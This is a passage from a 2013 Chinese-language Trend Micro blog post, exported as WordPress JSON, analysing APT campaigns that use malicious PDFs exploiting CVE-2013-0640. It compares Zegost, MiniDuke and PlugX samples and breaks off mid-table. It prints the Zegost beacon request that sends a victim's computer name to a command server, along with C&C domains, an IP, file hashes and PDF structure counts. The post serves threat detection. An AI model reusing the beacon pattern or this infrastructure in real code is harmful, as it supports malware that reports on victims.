{"id":5030,"date":"2013-06-25T09:01:23","date_gmt":"2013-06-25T01:01:23","guid":{"rendered":"https:\/\/blog.trendmicro.com.tw\/?p=5030"},"modified":"2019-03-13T10:59:10","modified_gmt":"2019-03-13T02:59:10","slug":"apt-%e6%94%bb%e6%93%8a%e8%97%89%e7%94%b1%e6%83%a1%e6%84%8fpdf%e6%94%bb%e6%93%8a%e7%a8%8b%e5%bc%8f%e7%a2%bc%e5%a4%a7%e9%87%8f%e5%a2%9e%e5%8a%a0%e4%b8%ad","status":"publish","type":"post","link":"https:\/\/blog.trendmicro.com.tw\/?p=5030","title":{"rendered":"APT \u653b\u64ca\u85c9\u7531\u60e1\u610fPDF\u653b\u64ca\u7a0b\u5f0f\u78bc\u5927\u91cf\u589e\u52a0\u4e2d"},"content":{"rendered":"<p>\u57282012\u5e74\u88e1\uff0c\u6211\u5011\u770b\u5230\u4e86<a href=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/cve-2012-0158-exploitation-seen-in-various-global-campaigns\/\">\u5404\u5f0f\u5404\u6a23\u7684<\/a>APT<a href=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/cve-2012-0158-now-being-used-in-more-tibetan-themed-targeted-attack-campaigns\/\">\u653b\u64ca\u6d3b\u52d5<\/a>\u5229\u7528Microsoft Word\u7684\u6f0f\u6d1e \u2013 CVE-2012-0158\u3002\u9019\u662f\u4e00\u7a2e<a href=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/snapshot-of-exploit-documents-for-april-2012\/\">\u8f49\u8b8a<\/a>\uff0c\u4e4b\u524d\u6700\u5e38\u88ab\u5229\u7528\u7684Word\u6f0f\u6d1e\u662fCVE-2010-3333\u3002\u96d6\u7136\u6211\u5011\u9084\u662f\u7e7c\u7e8c\u770b\u5230CVE-2012-0158\u88ab\u5927\u91cf\u7684\u4f7f\u7528\uff0c\u4e0d\u904e\u6211\u5011\u4e5f\u6ce8\u610f\u5230\u60e1\u540d\u662d\u5f70\u7684\u300c<a href=\"https:\/\/www.securelist.com\/en\/blog\/208194129\/The_MiniDuke_Mystery_PDF_0_day_Government_Spy_Assembler_0x29A_Micro_Backdoor\">MiniDuke<\/a>\u300d\u653b\u64ca\u6240\u88fd\u9020\u91dd\u5c0dAdobe Reader<a href=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/zero-day-vulnerability-hits-adobe-reader\/\">\u6f0f\u6d1e<\/a> \u2013 CVE-2013-0640\u7684\u653b\u64ca\u7a0b\u5f0f\u78bc\u4f7f\u7528\u91cf\u7684\u589e\u52a0\u3002\u9019\u4e9b\u60e1\u610fPDF\u6a94\u6848\u6240\u690d\u5165\u7684\u60e1\u610f\u8edf\u9ad4\u548cMiniDuke\u4e26\u7121\u95dc\u806f\uff0c\u4f46\u537b\u548c\u6b63\u5728\u9032\u884c\u4e2d\u7684<a href=\"https:\/\/blog.trendmicro.com.tw\/?p=123\">APT-\u9032\u968e\u6301\u7e8c\u6027\u6ef2\u900f\u653b\u64ca (Advanced Persistent Threat, APT)<\/a>\u6d3b\u52d5\u6709\u95dc\u3002<\/p>\n<figure class=\"thumbnail wp-caption alignnone\" style=\"width: 200px\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/blog.trendmicro.com.tw\/wp-content\/uploads\/2013\/02\/PDF.jpg\" alt=\"APT \u653b\u64ca\u85c9\u7531\u60e1\u610fPDF\u653b\u64ca\u7a0b\u5f0f\u78bc\u5927\u91cf\u589e\u52a0\u4e2d\" width=\"190\" height=\"222\"><figcaption class=\"caption wp-caption-text\">APT \u653b\u64ca\u85c9\u7531\u60e1\u610fPDF\u653b\u64ca\u7a0b\u5f0f\u78bc\u5927\u91cf\u589e\u52a0\u4e2d<\/figcaption><\/figure>\n<p><i>Zegost<\/i><\/p>\n<p><a href=\"https:\/\/www.trendmicro.com.tw\/edm\/Tracking.asp?id=2651&amp;name=20110916\">\u8da8\u52e2\u79d1\u6280<\/a>\u6240\u767c\u73fe\u7684\u4e00\u7d44\u60e1\u610fPDF\u6a94\u6848\uff0c\u85cf\u6709\u4e0a\u8ff0\u6f0f\u6d1e\u653b\u64ca\u78bc\u7684\u8a98\u990c\u6587\u7ae0\u4f7f\u7528\u7684\u662f\u8d8a\u5357\u6587\uff0c\u6a94\u6848\u540d\u7a31\u4e5f\u662f\u76f8\u540c\u7684\u8a9e\u8a00\u3002<\/p>\n<figure class=\"thumbnail wp-caption alignnone\" style=\"width: 560px\"><img loading=\"lazy\" decoding=\"async\" class=\" \" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2013\/04\/nart-pdf-1.jpg\" alt=\"APT \u653b\u64ca\u85c9\u7531\u60e1\u610fPDF\u653b\u64ca\u7a0b\u5f0f\u78bc\u5927\u91cf\u589e\u52a0\u4e2d\" width=\"550\" height=\"382\"><figcaption class=\"caption wp-caption-text\">\u5716\u4e00\u3001\u8a98\u990c\u6587\u4ef6\u6a23\u672c<\/figcaption><\/figure>\n<p>\u9019\u4e9bPDF\u6a94\u6848\u5167\u5d4c\u8457\u548cMiniDuke\u653b\u64ca\u6d3b\u52d5\u6240\u4f7f\u7528\u985e\u4f3c\u7684JavaScript\u7a0b\u5f0f\u78bc\u3002\u76f8\u4f3c\u4e4b\u8655\u5305\u62ec\u4e86\u985e\u4f3c\u7684\u51fd\u6578\u548c\u8b8a\u6578\u540d\u7a31\u3002<\/p>\n<figure class=\"thumbnail wp-caption alignnone\" style=\"width: 560px\"><img loading=\"lazy\" decoding=\"async\" src=\" https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2013\/04\/nart-pdf-2.jpg\" alt=\"APT \u653b\u64ca\u85c9\u7531\u60e1\u610fPDF\u653b\u64ca\u7a0b\u5f0f\u78bc\u5927\u91cf\u589e\u52a0\u4e2d\" width=\"550\" height=\"309\"><figcaption class=\"caption wp-caption-text\">\u5716\u4e8c\u3001\u985e\u4f3c\u7684JavaScript\u7a0b\u5f0f\u78bc<\/figcaption><\/figure>\n<p>\u4f7f\u7528Didier Steven\u7684<a href=\"https:\/\/blog.didierstevens.com\/programs\/pdf-tools\/\">PDFiD<\/a>\u5de5\u5177\u4f86\u5206\u6790\u9019PDF\u6a94\u6848\uff0c\u986f\u793a\u51fa\u9019\u5169\u500bPDF\u6a94\u6848\u975e\u5e38\u76f8\u4f3c\u3002\u96d6\u7136\u4e26\u975e\u5b8c\u5168\u76f8\u540c\uff0c\u4f46\u5169\u8005\u4e4b\u9593\u7684\u76f8\u4f3c\u4e4b\u8655\u662f\u96e3\u4ee5\u5426\u8a8d\u7684\u3002\u6709\u610f\u601d\u7684\u5730\u65b9\u662f\u300c\/Javascript\u300d\u3001\u300c\/OpenAction\u300d\u548c\u300c\/Page\u300d\u3002\u9019\u4e9b\u5730\u65b9\u4ee3\u8868\u8457\u6709JavaScript\u51fa\u73fe\uff0c\u6709\u67d0\u7a2e\u81ea\u52d5\u884c\u70ba\u51fa\u73fe\u548c\u9801\u78bc\u3002\u9019\u4e09\u500b\u9805\u76ee\u53ef\u4ee5\u5e6b\u6211\u5011\u78ba\u8a8dMiniDuke\u548cZegost\u7684\u76f8\u4f3c\u4e4b\u8655\u3002<\/p>\n<p><!--more--><\/p>\n<p>\u690d\u5165\u7684\u6a94\u6848\u548c\u8cc7\u6599\u4e5f\u5dee\u4e0d\u591a\u3002\u9019\u5169\u7a2e\u653b\u64ca\u6d3b\u52d5\u90fd\u690d\u5165\u76f8\u540c\u6578\u91cf\u7684\u6a94\u6848\uff0c\u6709\u8457\u975e\u5e38\u76f8\u4f3c\u7684\u6a94\u6848\u540d\u7a31\u8207\u985e\u4f3c\u7684\u76ee\u7684\u3002\u5373\u4f7f\u8a3b\u518a\u8868\u7684\u4fee\u6539\u90e8\u5206\u4e5f\u5f88\u985e\u4f3c\u3002<\/p>\n<p>\u4e0d\u904e\u9019\u4e5f\u662f\u76f8\u4f3c\u7684\u5168\u90e8\u5730\u65b9\u3002\u9019\u4e9bPDF\u6240\u690d\u5165\u7684\u6a94\u6848\u88ab\u7a31\u70baZegost\uff08\u6216HTTPTunnel\uff09\uff0c\u66fe\u7d93\u5728<a href=\"https:\/\/artemonsecurity.blogspot.ca\/2012\/12\/zegost-analysis-of-chinese-backdoor.html\">\u4e4b\u524d<\/a>\u7684\u653b\u64ca\u88e1\u88ab\u767c\u73fe\u904e\u3002\u548cMiniDuke\u653b\u64ca\u6240\u690d\u5165\u7684\u60e1\u610f\u8edf\u9ad4\u4e26\u7121\u95dc\u806f\u3002Zegost\u60e1\u610f\u8edf\u9ad4\u6709\u500b\u9bae\u660e\u7684\u7279\u5fb5\uff1a<\/p>\n<p>GET \/cgi\/online.asp?hostname=[COMPUTERNAME]&amp;httptype=[1][not%20httptunnel] HTTP\/1.1<\/p>\n<p>User-Agent: Mozilla\/4.0 (compatible; MSIE 6.0; Win32)<\/p>\n<p>Host: dns.yimg.ca<\/p>\n<p>Cache-Control: no-cache<\/p>\n<p>\u547d\u4ee4\u548c\u63a7\u5236\u4f3a\u670d\u5668 \u2013 <i>dns.yimg.ca<\/i>\u6240\u53cd\u67e5\u51fa\u7684IP \u2013 223.26.55.122\uff0c\u4e00\u76f4\u88ab\u7528\u5728\u6bd4\u8f03\u77e5\u540d\u7684\u547d\u4ee4\u548c\u63a7\u5236\u4f3a\u670d\u5668\u4e0a\uff0c\u50cf\u662f<i>imm.conimes.com<\/i>\u548c<i>iyy.conimes.com<\/i>\u3002\u7528\u4f86\u8a3b\u518a\u9019\u7db2\u57df\u7684\u96fb\u5b50\u90f5\u4ef6\u5730\u5740 \u2013 <i>llssddzz@gmail.com<\/i>\uff0c\u4e5f\u88ab\u7528\u4f86\u8a3b\u518a<i>scvhosts.com<\/i>\uff08\u53e6\u5916\u4e00\u500b<a href=\"https:\/\/www.drwebhk.com\/en\/virus_techinfo\/Trojan.DownLoader6.27994.html\">\u5df2\u77e5<\/a>\u7684C\uff06C\u4f3a\u670d\u5668\u5668\uff09\u548c<i>updata-microsoft.com<\/i>\uff0c\u61c9\u8a72\u4e5f\u662f\u6709\u554f\u984c\u7684\u7db2\u57df\u3002<\/p>\n<p><i><a href=\"https:\/\/blog.trendmicro.com.tw\/?p=10800\">PlugX<\/a>&nbsp;(<\/i><a href=\"https:\/\/blog.trendmicro.com.tw\/?p=10800\" rel=\"bookmark\">\u5ba2\u88fd\u5316\u7684\u9060\u7aef\u5b58\u53d6\u5de5\u5177, \u91dd\u5c0d\u81fa\u7063\u5728\u5167\u7279\u5b9a\u76ee\u6a19\u767c\u52d5 APT \u653b\u64ca<\/a>)<i>)<\/i><\/p>\n<p>\u7b2c\u4e8c\u7d44\u7684\u60e1\u610fPDF\u6a94\u6848\u9593\u4e26\u4e0d\u4e00\u5b9a\u90fd\u76f4\u63a5\u6709\u95dc\u9023\uff0c\u96d6\u7136\u5b83\u5011\u90fd\u6703\u503c\u5165\u4e0d\u540c\u7684<a href=\"https:\/\/blog.trendmicro.com.tw\/?p=10800\">PlugX<\/a>\u8b8a\u7a2e\u3002\u6211\u5011\u6240\u5206\u6790\u7684\u653b\u64ca\u4f3c\u4e4e\u91dd\u5c0d\u8457\u65e5\u672c\u3001\u97d3\u570b\u548c\u5370\u5ea6\u7684\u76ee\u6a19\u3002<\/p>\n<p>\u7136\u800c\uff0c\u96d6\u7136\u9019\u4e9b\u653b\u64ca\u4e5f\u662f\u5229\u7528\u6f0f\u6d1e \u2013 CVE-2013-0640\uff0c\u4f46\u662f\u5b83\u5011\u548c\u4e0a\u9762\u6240\u8a0e\u8ad6\u7684\u6a23\u672c\u4e0d\u540c\u3002\u6bd4\u8f03\u6a94\u6848\u6642\u5c31\u53ef\u4ee5\u770b\u51fa\u5dee\u7570\uff0c\u6bd4\u65b9\u8aaa\u4f7f\u7528\u7684PDF\u683c\u5f0f\u7248\u672c\uff1a<\/p>\n<style>\n   table {border-collapse:collapse; table-layout:fixed; width:310px;}\n   table td {border:solid 1px ; width:100px; word-wrap:break-word;}\n   <\/style>\n<table  class=\" table table-hover\" border=\"1\" width=\"749\" cellspacing=\"0\" cellpadding=\"0\" align=\"left\">\n<tbody>\n<tr>\n<td valign=\"bottom\" width=\"271\">\n<p align=\"center\">Zegost<\/p>\n<\/td>\n<td valign=\"bottom\" width=\"265\">\n<p align=\"center\">MiniDuke<\/p>\n<\/td>\n<td valign=\"bottom\" width=\"213\">\n<p align=\"center\">PlugX<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"271\">&nbsp;PDF Header: %PDF-1.4<\/td>\n<td width=\"265\">&nbsp;PDF Header: %PDF-1.4<\/td>\n<td valign=\"bottom\" width=\"213\">&nbsp;PDF Header: %PDF-1.7<\/td>\n<\/tr>\n<tr>\n<td width=\"271\">&nbsp;obj&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 8<\/td>\n<td width=\"265\">&nbsp;obj&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 8<\/td>\n<td valign=\"bottom\" width=\"213\">&nbsp;obj&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 43<\/td>\n<\/tr>\n<tr>\n<td width=\"271\">&nbsp;endobj&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 8<\/td>\n<td width=\"265\">&nbsp;endobj&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 8<\/td>\n<td valign=\"bottom\" width=\"213\">&nbsp;endobj&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 44<\/td>\n<\/tr>\n<tr>\n<td width=\"271\">&nbsp;stream&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 3<\/td>\n<td width=\"265\">&nbsp;stream&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1<\/td>\n<td valign=\"bottom\" width=\"213\">&nbsp;stream&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 10<\/td>\n<\/tr>\n<tr>\n<td width=\"271\">&nbsp;endstream&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 3<\/td>\n<td width=\"265\">&nbsp;endstream&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 2<\/td>\n<td valign=\"bottom\" width=\"213\">&nbsp;endstream&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 11<\/td>\n<\/tr>\n<tr>\n<td width=\"271\">&nbsp;xref&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1<\/td>\n<td width=\"265\">&nbsp;xref&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1<\/td>\n<td valign=\"bottom\" width=\"213\">&nbsp;xref&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 4<\/td>\n<\/tr>\n<tr>\n<td width=\"271\">&nbsp;trailer&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1<\/td>\n<td width=\"265\">&nbsp;trailer&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1<\/td>\n<td valign=\"bottom\" width=\"213\">&nbsp;trailer&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 4<\/td>\n<\/tr>\n<tr>\n<td width=\"271\">&nbsp;startxref&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1<\/td>\n<td width=\"265\">&nbsp;startxref&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1<\/td>\n<td valign=\"bottom\" width=\"213\">&nbsp;startxref&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 4<\/td>\n<\/tr>\n<tr>\n<td width=\"271\">&nbsp;\/Page&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1<\/td>\n<td width=\"265\">&nbsp;\/Page&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1<\/td>\n<td valign=\"bottom\" width=\"213\">&nbsp;\/Page&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 6<\/td>\n<\/tr>\n<tr>\n<td width=\"271\">&nbsp;\/Encrypt&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0<\/td>\n<td width=\"265\">&nbsp;\/Encrypt&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1<\/td>\n<td valign=\"bottom\" width=\"213\">&nbsp;\/Encrypt&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0<\/td>\n<\/tr>\n<tr>\n<td width=\"271\">&nbsp;\/ObjStm&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0<\/td>\n<td width=\"265\">&nbsp;\/ObjStm&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;0<\/td>\n<td valign=\"bottom\" width=\"213\">&nbsp;\/ObjStm&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0<\/td>\n<\/tr>\n<tr>\n<td width=\"271\">&nbsp;\/JavaScript&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1<\/td>\n<td width=\"265\">&nbsp;\/JavaScript&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1<\/td>\n<td valign=\"bottom\" width=\"213\">&nbsp;\/JavaScript&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1<\/td>\n<\/tr>\n<tr>\n<td width=\"271\">&nbsp;\/AA&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0<\/td>\n<td width=\"265\">&nbsp;\/AA&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0<\/td>\n<td valign=\"bottom\" width=\"213\">&nbsp;\/AA&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0<\/td>\n<\/tr>\n<tr>\n<td width=\"271\">&nbsp;\/OpenAction&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1<\/td>\n<td width=\"265\">&nbsp;\/OpenAction&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1<\/td>\n<td valign=\"bottom\" width=\"213\">&nbsp;\/OpenAction&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1<\/td>\n<\/tr>\n<tr>\n<td width=\"271\">&nbsp;\/AcroForm&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1<\/td>\n<td width=\"265\">&nbsp;\/AcroForm&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1<\/td>\n<td valign=\"bottom\" width=\"213\">&nbsp;\/AcroForm&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1<\/td>\n<\/tr>\n<tr>\n<td width=\"271\">&nbsp;\/JBIG2Decode&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0<\/td>\n<td width=\"265\">&nbsp;\/JBIG2Decode&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0<\/td>\n<td valign=\"bottom\" width=\"213\">&nbsp;\/JBIG2Decode&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0<\/td>\n<\/tr>\n<tr>\n<td width=\"271\">&nbsp;\/RichMedia&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0<\/td>\n<td width=\"265\">&nbsp;\/RichMedia&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0<\/td>\n<td valign=\"bottom\" width=\"213\">&nbsp;\/RichMedia&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0<\/td>\n<\/tr>\n<tr>\n<td width=\"271\">&nbsp;\/Launch&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0<\/td>\n<td width=\"265\">&nbsp;\/Launch&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0<\/td>\n<td valign=\"bottom\" width=\"213\">&nbsp;\/Launch&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0<\/td>\n<\/tr>\n<tr>\n<td width=\"271\">&nbsp;\/EmbeddedFile&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0<\/td>\n<td width=\"265\">&nbsp;\/EmbeddedFile&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0<\/td>\n<td valign=\"bottom\" width=\"213\">&nbsp;\/EmbeddedFile&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0<\/td>\n<\/tr>\n<tr>\n<td width=\"271\">&nbsp;\/XFA&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1<\/td>\n<td width=\"265\">&nbsp;\/XFA&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1<\/td>\n<td valign=\"bottom\" width=\"213\">&nbsp;\/XFA&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1<\/td>\n<\/tr>\n<tr>\n<td width=\"271\">&nbsp;\/Colors &gt; 2^24&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0<\/td>\n<td width=\"265\">&nbsp;\/Colors &gt; 2^24&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0<\/td>\n<td valign=\"bottom\" width=\"213\">&nbsp;\/Colors &gt; 2^24&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><a href=\"https:\/\/blog.trendmicro.com.tw\/?p=10800\">Plug\uff38<\/a>\u4e5f\u6703\u690d\u5165\u6a94\u6848\u548c\u8cc7\u6599\uff0c\u4f46\u662f\u537b\u548cZegost\u6216MiniDuke\u90fd\u4e0d\u76f8\u540c\u3002\u6a94\u6848\u6578\u91cf\u4e0d\u540c\uff0c\u690d\u5165\u539f\u56e0\u4e5f\u4e0d\u540c\u3002<\/p>\n<table  class=\" table table-hover\" border=\"1\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td valign=\"bottom\">\n<p align=\"center\">Zegost<\/p>\n<\/td>\n<td valign=\"bottom\">\n<p align=\"center\">MiniDuke<\/p>\n<\/td>\n<td valign=\"bottom\">\n<p align=\"center\">PlugX<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td valign=\"bottom\"><b>UserCache.bin<\/b><\/td>\n<td valign=\"bottom\"><b>UserCache.bin<\/b><\/td>\n<td valign=\"bottom\"><b>UserCache.bin<\/b><\/td>\n<\/tr>\n<tr>\n<td valign=\"bottom\">39f5d27d1a5e34ce9863406b799ef47a<\/td>\n<td valign=\"bottom\">39f5d27d1a5e34ce9863406b799ef47a<\/td>\n<td valign=\"bottom\">39f5d27d1a5e34ce9863406b799ef47a<\/td>\n<\/tr>\n<tr>\n<td valign=\"bottom\"><b>ACECache10.lst<\/b><\/td>\n<td valign=\"bottom\"><b>ACECache10.lst<\/b><\/td>\n<td valign=\"bottom\"><b>ACECache10.lst<\/b><\/td>\n<\/tr>\n<tr>\n<td valign=\"bottom\">a1bb36552f1336466b4d728948393585<\/td>\n<td valign=\"bottom\">77402ee32c656d68eeb8a07e2a041dfb<\/td>\n<td valign=\"bottom\">77e16369d995628ff9df31c56129a2f2<\/td>\n<\/tr>\n<tr>\n<td valign=\"bottom\"><b>A9RD50B.tmp (PDF)<\/b><\/td>\n<td valign=\"bottom\"><b>A9RE077.tmp (PDF)<\/b><\/td>\n<td valign=\"bottom\"><b>SharedDataEvents<\/b><\/td>\n<\/tr>\n<tr>\n<td valign=\"bottom\">dd28e2e06465464f0cb5eca4a9013421<\/td>\n<td valign=\"bottom\">85b890c0b10faa13014d4a22dae3fe3c<\/td>\n<td valign=\"bottom\">1a8d23271be2c45f31a537eaefbbf55d<\/td>\n<\/tr>\n<tr>\n<td valign=\"bottom\"><b>A9RD50A.tmp (PDF)<\/b><\/td>\n<td 